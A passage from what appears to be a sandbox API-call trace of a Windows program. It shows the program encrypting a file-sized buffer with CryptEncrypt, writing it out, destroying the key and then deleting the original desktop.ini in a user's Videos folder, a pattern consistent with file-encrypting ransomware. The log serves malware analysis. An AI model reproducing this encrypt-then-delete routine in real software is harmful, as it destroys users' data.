lpMsg=0x8cef58) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab5d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.599] CryptEncrypt (in: hKey=0x9e1ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a75760*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x200 | out: pbData=0x2a75760*, pdwDataLen=0x8cef60*=0x200) returned 1 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.600] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.600] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.600] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.600] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.600] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.600] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.600] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.600] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.600] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.600] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.601] WriteFile (in: hFile=0x4f4, lpBuffer=0x2a75368*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a75368*, lpNumberOfBytesWritten=0x8cf5e4*=0x200, lpOverlapped=0x0) returned 1 [0212.602] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.602] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.602] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0212.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.602] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0212.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.602] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.602] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.602] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.602] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.602] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab668, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.602] CryptDestroyKey (hKey=0x9e1ab8) returned 1 [0212.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.602] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.603] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.603] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.603] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.603] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.603] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.603] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.603] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.603] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.603] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.603] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.603] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.603] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.603] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.604] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.604] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.604] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.604] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.604] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.605] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.605] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.605] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.605] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.605] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.605] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.605] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.605] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.605] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.605] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.605] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.605] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.605] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.605] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.605] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.605] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.605] CryptReleaseContext (hProv=0xa7c198, dwFlags=0x0) returned 1 [0212.605] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.605] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.606] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.606] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.606] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.606] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.606] FreeLibrary (hLibModule=0x76390000) returned 1 [0212.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.606] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.606] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.606] CloseHandle (hObject=0x504) returned 1 [0212.608] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.608] CloseHandle (hObject=0x4f4) returned 1 [0212.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.609] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.609] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.610] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.610] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x22 [0212.610] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini")) returned 0x26 [0212.610] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e1bf8 [0212.610] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini")) returned 1 [0212.612] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0212.612] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0212.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a749e8 | out: hHeap=0x2af0000) returned 1 [0212.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.612] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0212.613] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.613] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0212.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0212.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: 